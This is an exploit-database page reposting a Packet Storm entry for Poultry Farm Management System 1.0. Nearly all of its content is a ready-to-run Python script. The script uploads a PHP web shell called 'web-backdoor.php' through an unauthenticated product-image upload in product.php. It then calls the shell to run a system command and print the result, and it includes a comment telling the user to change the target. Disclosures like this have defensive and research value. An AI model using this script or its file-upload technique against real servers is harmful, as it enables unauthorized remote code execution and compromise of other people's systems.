Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJerry ThomasPACKETSTORM:179206
HistoryJun 26, 2024 - 12:00 a.m.

Poultry Farm Management System 1.0 Shell Upload

2024-06-2600:00:00
Jerry Thomas
packetstormsecurity.com
67

7.4 High

AI Score

Confidence

Low

JSON
`# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)  
# Date: 24-06-2024  
# CVE: N/A (Awaiting ID to be assigned)  
# Exploit Author: Jerry Thomas (w3bn00b3r)  
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip  
# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/  
# Category: Web Application  
# Version: 1.0  
# Tested on: Windows 10 | Xampp v3.3.0  
# Vulnerable endpoint: http://localhost/farm/product.php  
  
import requests  
from colorama import Fore, Style, init  
  
# Initialize colorama  
init(autoreset=True)  
  
def upload_backdoor(target):  
upload_url = f"{target}/farm/product.php"  
shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"  
  
# Prepare the payload  
payload = {  
'category': 'CHICKEN',  
'product': 'rce',  
'price': '100',  
'save': ''  
}  
  
# PHP code to be uploaded  
command = "hostname"  
data = f"<?php system('{command}');?>"  
  
# Prepare the file data  
files = {  
'productimage': ('web-backdoor.php', data, 'application/x-php')  
}  
  
try:  
print("Sending POST request to:", upload_url)  
response = requests.post(upload_url, files=files, data=payload,  
verify=False)  
  
if response.status_code == 200:  
print("\nResponse status code:", response.status_code)  
print(f"Shell has been uploaded successfully: {shell_url}")  
  
# Make a GET request to the shell URL to execute the command  
shell_response = requests.get(shell_url, verify=False)  
print("Command output:", Fore.GREEN +  
shell_response.text.strip())  
else:  
print(f"Failed to upload shell. Status code:  
{response.status_code}")  
print("Response content:", response.text)  
except requests.RequestException as e:  
print(f"An error occurred: {e}")  
  
if __name__ == "__main__":  
target = "http://localhost" # Change this to your target  
upload_backdoor(target)  
  
  
`

7.4 High

AI Score

Confidence

Low

JSON